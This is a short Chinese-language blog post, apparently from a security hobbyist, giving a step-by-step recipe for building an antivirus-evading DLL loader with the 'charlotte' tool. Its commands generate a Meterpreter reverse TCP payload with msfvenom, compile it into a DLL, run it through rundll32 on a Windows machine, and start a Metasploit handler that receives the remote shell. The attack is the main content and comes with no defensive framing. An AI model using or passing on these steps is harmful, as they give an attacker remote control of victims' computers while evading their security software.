charlotte 低调入过

不点赞的都是龟孙

预览 / Preview

image-20210521140840187

image-20210521140857943

image-20210521140944464

image-20210521174512982

生成payload

1
2
3
4
5
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py # 最后一行有个命令 rundll32 xxxxxxxx
rundll32 charlotte.dll, UehQD3rwWxT

运行payload

1
C:\Windows\System32\rundll32.exe C:\Users\xr\Desktop\charlotte.dll UehQD3rwWxT

监听payload

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.21.129
set lport 53237
run

XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way